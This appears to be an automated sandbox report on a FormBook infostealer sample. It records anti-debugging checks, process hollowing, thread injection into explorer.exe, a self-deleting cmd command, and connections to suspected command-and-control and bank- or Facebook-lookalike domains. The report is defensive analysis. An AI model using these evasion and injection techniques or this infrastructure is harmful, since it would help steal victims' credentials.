Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05002D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05002D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05002D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050335A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050361A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050361A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050869A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05031DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05031DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05031DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050941E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050B8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05020050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05020050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05009080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05083884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05083884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050490AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050058EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05086CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0509FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05004F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05004F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05033B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05033B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050BD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05011B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05011B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05018794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05087794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050853CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050853CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050437F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05038E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05018A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05005210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05005210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05005210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05005210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05023A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A61C mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\ff0231.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 3_2_0040ACE0 LdrLoadDll,

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_10006DA9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 5.9.96.94 80
Source: C:\Windows\explorer.exe	Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe	Domain query: www.teslaislandboys.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80
Source: C:\Windows\explorer.exe	Domain query: www.schuette.tech
Source: C:\Windows\explorer.exe	Domain query: www.meta-facebook.life
Source: C:\Windows\explorer.exe	Domain query: www.facebook-meta.net
Source: C:\Windows\explorer.exe	Network Connect: 185.53.178.54 80
Source: C:\Windows\explorer.exe	Domain query: www.comptesgratuit.fr
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.evchargeoracle.com
Source: C:\Windows\explorer.exe	Domain query: www.chasesecurobanking.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\ff0231.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1070000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\ff0231.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ff0231.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ff0231.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: unknown protection: read write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\ff0231.exe

Memory written: C:\Users\user\Desktop\ff0231.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ff0231.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ff0231.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 6012

Source: C:\Users\user\Desktop\ff0231.exe	Process created: C:\Users\user\Desktop\ff0231.exe "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ff0231.exe"

Source: explorer.exe, 00000010.00000000.873688142.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000010.00000000.806552019.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: GProgman
Source: explorer.exe, 00000005.00000000.680348360.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.710337687.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.693769733.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.694248154.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.680861129.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710578912.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.682837732.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.694248154.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.680861129.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710578912.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.1195863451.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000003.806389937.0000000004B41000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.876694512.0000000004B74000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.821595655.0000000004B74000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.874008659.00000000010E0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000003.806569540.0000000004B71000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.807619992.00000000010E0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.877804604.0000000004DA0000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.823573797.0000000004DA0000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.694248154.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.680861129.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710578912.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.1195863451.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.874008659.00000000010E0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.807619992.00000000010E0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.877804604.0000000004DA0000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.823573797.0000000004DA0000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000009.00000002.1195863451.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.874008659.00000000010E0000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.807619992.00000000010E0000.00000002.00020000.sdmp	Binary or memory string: EProgram Manager
Source: explorer.exe, 00000005.00000000.694248154.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.680861129.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710578912.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000010.00000000.807619992.00000000010E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.686890650.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700630770.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.718270528.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D
Source: explorer.exe, 00000010.00000003.806389937.0000000004B41000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.876694512.0000000004B74000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.821595655.0000000004B74000.00000004.00000001.sdmp, explorer.exe, 00000010.00000003.806569540.0000000004B71000.00000004.00000001.sdmp	Binary or memory string: ProgmanP

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_10005A84 cpuid

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Source: explorer.exe, 00000010.00000003.834907538.0000000006236000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.836697354.0000000006210000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.880477634.0000000006210000.00000004.00000001.sdmp

Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE
